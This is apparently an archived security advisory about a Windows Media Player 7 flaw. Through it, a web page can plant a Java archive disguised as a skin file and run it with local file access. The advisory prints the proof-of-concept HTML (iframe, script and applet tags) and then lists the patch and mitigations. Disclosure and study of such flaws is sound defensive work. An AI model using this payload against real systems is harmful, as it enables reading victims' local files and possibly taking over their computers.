COMMAND

    Media Player

SYSTEMS AFFECTED

    Windows Media Player 7

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #35.
    There  is  a  security  vulnerability  in  Windows  Media Player 7
    exploitable thru IE and java which allows reading local files  and
    browsing directories which  in turn allows  executing arbitratrary
    programs.   This  may  lead  to  taking  full  control over user's
    computer.

    The problem is  WMP skins are  installed in a  known directory and
    with a known name:

        "C:/Program files/Windows Media Player/Skins/SKIN.WMZ" : <IFRAME SRC="wmp2.wmz"></IFRAME>

    will download wmp2.wmz and place it in

        "C:/Program files/Windows Media Player/Skins/wmp2.wmz"

    wmp2.wmz may be a java jar archive.  The following applet tag:

        <APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
        CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
        <PARAM NAME="URL" VALUE="file:///c:/test.txt">
        </APPLET>

    will be  executed with  codebase="file://c:/" and  the applet will
    have read only access to C:\.

    The code is:

        --------wmp7-3.html--------------------------------------------------
        <IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
        <SCRIPT>
        function f()
        {
        window.open("wmp7-3a.html");
        }
        setTimeout("f()",4000);
        </SCRIPT>
        ------wmp7-3a.html---------------------------------------------------
        <APPLET CODEBASE="file://c:/"
        ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class"
        WIDTH=700 HEIGHT=300>
        <PARAM NAME="URL" VALUE="file:///c:/test.txt">
        </APPLET>

    Demonstration is available at:

        http://www.guninski.com/wmp7-3.html

SOLUTION

    Disable Java.   A patch  is available  to fix  this vulnerability.
    Please read the Security Bulletin:

        http://www.microsoft.com/technet/security/bulletin/ms01-010.asp